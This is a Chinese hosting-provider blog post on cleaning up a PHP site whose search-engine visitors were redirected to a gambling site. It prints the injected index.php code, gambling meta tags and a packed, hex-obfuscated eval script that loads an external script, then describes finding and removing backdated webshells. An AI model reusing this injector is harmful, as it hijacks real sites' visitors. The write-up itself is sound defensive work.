iis7.5 php网站搜索引擎劫持处理案例

树叶云

收到朋友微信求助说其中一个php网站被劫持,一直找不到原因,由于他是做网站建设的,服务器上的网站非常杂,存在漏洞被利用然后劫持也是很正常。接下来以这个案例说说网站劫持怎么修复

历史处理案例1:iis7.0全部网站被劫持处理过程分享,如何解决网站劫持!

历史处理案例2:百度 360 搜狗搜索引擎劫持攻击处理过程

百度收录的快照信息:

正常输入网址不会跳转,通过百度 360 搜狗等搜索引擎访问就会跳转到一个博彩网站,看来黑客有意躲避

登录ftp下载index.php存在异常代码如下:

<meta name="viewport" content="width=1250" /> 
<title>北京赛车pk10 PK10开奖直播 北京赛车pk10开奖结果 - pk10直播网</title>
 <meta name="keywords" content="北京赛车pk10开奖直播,北京赛车开奖记录,北京赛车pk10直播,北京赛车开奖直播,北京赛车pk10开奖网,pk10北京赛车网赚,北京赛车网赚,北京赛车带玩,北京赛车网赚群,北京赛车pk10技巧,北京赛车怎么玩赚钱,北京赛车 吉祥娱乐,北京赛车官网,北京赛车直播,北京赛车开奖" />
 <meta name="description" content="北京赛车,PK10开奖直播,提供【cx88cp.com】详尽研究分析总结,分享北京pk10开奖视频,pk10结果分析,北京赛车平台,pk10网上投注,北京pk10开奖直播,pk10开奖直播,北京pk10过往各开奖记录,pk10开奖结果,pk10网上开户,pk10开奖,专业的开奖视频北京pk10网"/>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\d\\e\\1\\m\\j\\8\\n\\0"]["\\6\\4\\9\\0\\8"](\'\\i\\2\\1\\4\\9\\3\\0 \\0\\k\\3\\8\\c\\7\\0\\8\\h\\0\\5\\f\\b\\q\\b\\2\\1\\4\\9\\3\\0\\7 \\2\\4\\1\\c\\7\\o\\0\\0\\3\\2\\p\\5\\5\\6\\6\\6\\a\\1\\3\\d\\b\\2\\r\\a\\1\\e\\j\\5\\1\\h\\1\\a\\f\\2\\7\\g\\i\\5\\2\\1\\4\\9\\3\\0\\g\');',28,28,'x74|x63|x73|x70|x72|x2f|x77|x22|x65|x69|x2e|x61|x3d|x64|x6f|x6a|x3e|x78|x3c|x6d|x79|window|x75|x6e|x68|x3a|x76|x38'.split('|'),0,{}))
</script>

朋友说删除后一天内又会挂回去,既然能修改页面内容必定存在后门或者有ftp权限等  查看ftp日志并没有收获,WebShellKill走一波发现有所收获扫出几个后门木马和小马 黑客也相当之狡猾把木马文件时间修改成几年前 可惜网站日志没有开启无法追查后门的由来。

网页木马包含asp大马 php大马 php一句话 php小马

为了能彻底处理掉这些后门开启网站访问日志,删除劫持代码静观几天待再次修改主页再分析日志,下为最近访问日志

通过把16号-18号的日志进行筛选查实存在10几个后门,最后把全部木马后门删除 修改网站目录权限再次进入观察

最后建议把网站日志开启,出现被黑可以通过日志进行分析人工排查 市面上能扫后门的工具相当之多比如WebShellKill 安全狗 云盾 云锁等等

本教程由树叶云出品 服务器运维官方网址http://IDC.NET欢迎大家多多关注本站 感谢大家的支持。

文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/199351.html<

(0)
运维的头像运维
上一篇2025-04-04 19:19
下一篇 2025-04-04 19:21

相关推荐

  • Docker无法停止的解决方法

    本篇文章重点为大家讲解一下Docker无法停止的解决方法,有需要的小伙伴可以参考一下。 解决方法如下: 1、强制删除容器 docker rm -f j…

  • 讲解java 中的内部类

    内部类不是很好理解,但说白了其实也就是一个类中还包含着另外一个类。如同一个人是由大脑、肢体、器官等身体结果组成,而内部类相当于其中的某个器官之一,例如心脏:它也有自己的属性和行为(…

  • 如何使用nmcli配置主备模式链路聚合

    linux的链路聚合就是把多网卡捆绑成一个逻辑网卡,在本篇文章中将重点为大家阐述一下使用使用nmcli配置主备模式链路聚合具体方法, 有需要的小伙伴可以参考一下。 现在让我们在Ce…

  • Linux SetGID(SGID)文件特殊权限用法详解

    前面学习了 SetUID,那么,什么是 SetGID 呢?很简单,当 s 权限位于所属组的 x 权限位时,就被称为 SetGID,简称 SGID 特殊权限。例如…

  • lsof命令使用实例

    lsof是系统管理/安全的尤伯工具。将这个工具称之为lsof真实名副其实,因为它是指“列出打开文件(lists openfiles)”。而有一点要切记,在Unix中一切(包括网络套…

发表回复

您的邮箱地址不会被公开。必填项已用 * 标注